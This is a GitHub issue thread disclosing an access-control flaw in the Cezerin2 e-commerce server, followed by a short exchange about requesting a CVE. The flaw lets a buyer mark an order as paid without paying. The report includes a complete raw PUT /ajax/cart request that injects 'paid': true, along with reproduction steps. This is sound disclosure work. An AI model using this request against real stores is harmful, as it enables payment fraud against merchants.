### ISSUE TITLE
Improper Access Control

### ISSUE THREAD

**Issue by Hbkhan** [Cezerin2/Server#269]
**Describe the bug**

The vulnerability exists in the checkout page which allows an attacker to send extra parameter values e.g `paid`, which result in manipulating the order status to paid (without paying anything)

**To Reproduce**

1. Add any item to the chart and checkout.

![82118340-61a11500-973c-11ea-9426-70cbddeeeeb7](https://user-images.githubusercontent.com/17072444/84673958-f770c100-aeef-11ea-8c95-c0ecc75463fc.PNG)

2.  Add additional attributes (e.g., paid, tax_rate, shipping_price, shipping_discount, etc.) to the user input field in the request. In my case, I added paid

``` code 

PUT /ajax/cart HTTP/1.1
Host: localhost:3001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 752
Origin: http://localhost:3000
Referer: http://localhost:3000/checkout
Connection: close
Cookie: referrer_url=s%3Ahttp%3A%2F%2Flocalhost%3A3002%2Fproduct%2F5ebf904f019a46570832cb1f.YDyXRnpoWg0Cn6i%2BL2kx2UETY0PqY8%2BXWJ5LPCyoJ%2Fo; landing_url=s%3Ahttp%3A%2F%2Flocalhost%2F.tyZ3uwyR9gAuGEJzxP6kxtZ8cXlAsZTbPH6NKLaAhHk; order_id=s%3A5ebfc8fe30e7a22e0884afdf.bmuz92dPI6fLGaNVOxXckNXktUZDtsBNFR1z2pb4NXA

{"shipping_address":{"address1":"Testbug street","address2":"Testbug street","city":"testbug","country":"US","state":"TESTBUG","phone":"","postal_code":"00001","full_name":"","company":"","tax_number":"","coordinates":{"latitude":"","longitude":""},"details":null},"billing_address":{"address1":"","address2":"","city":"","country":"","state":"","phone":"","postal_code":"","full_name":"","company":"","tax_number":"","coordinates":{"latitude":"","longitude":""},"details":null},"email":"testbug@testbug.com","mobile":"+11312312312","first_name":"Testbug","last_name":"Testbug","password":"http://localhost:3000/checkout","payment_method_id":"5ebf904f019a46570832cb29","shipping_method_id":"5ebf904f019a46570832cb28","comments":"", "paid": true}
```

![82118517-88138000-973d-11ea-8ce8-863b49ab230d](https://user-images.githubusercontent.com/17072444/84674097-26873280-aef0-11ea-86af-f6b0bbb70f6a.PNG)

3. The status of the order is set as paid without payments.

![82118491-6a461b00-973d-11ea-92e2-bf53dcd5cb66](https://user-images.githubusercontent.com/17072444/84674137-356de500-aef0-11ea-9fa0-838f5b198a29.PNG)

**Expected behavior**

The application shouldn't be accepting extra values from user! 

**Additional context**
This issue was initially being reported in cezerin 0.33.0 [here](https://github.com/cl0udz/vulnerabilities/tree/master/cezerin-manipulate_order_information)

When I was introducing a fix for that which you can find in [here](https://github.com/418sec/cezerin/pull/1) I found that Cezerin2 v0.33.0 - v0.35.0 ( all versions ) are also vulnerable

Let me know if you want me to request CVE for this!

**Comment by Hbkhan** [comment]
@vamcart Can you request CVE for this?

**Comment by vamcart** [comment]
> @vamcart Can you request CVE for this?

Hi!

I can't, i'm never added CVE reports before.
If you can do this - it will be awesome.

**Comment by Hbkhan** [comment]
@vamcart : https://help.github.com/en/github/managing-security-vulnerabilities/publishing-a-security-advisory

**Comment by Hbkhan** [comment]
@vamcart Here is the process for how to request one : https://help.github.com/en/github/managing-security-vulnerabilities/publishing-a-security-advisory#requesting-a-cve-identification-number

**Comment by vamcart** [comment]
Thanks
